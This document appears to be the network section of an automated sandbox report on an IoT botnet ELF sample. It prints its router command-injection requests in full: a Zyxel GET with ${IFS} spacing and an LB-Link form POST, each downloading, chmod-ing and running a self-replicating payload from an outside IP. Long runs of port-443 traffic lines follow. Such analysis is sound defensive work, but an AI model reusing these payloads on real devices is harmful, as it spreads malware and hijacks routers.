            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
            Source: 3wN5NfZaD8.elfString found in binary or memory: http://103.180.149.156/huhu.mips;$
            Source: 3wN5NfZaD8.elfString found in binary or memory: http://103.180.149.156/huhu.mpsl;
            Source: 3wN5NfZaD8.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: 3wN5NfZaD8.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
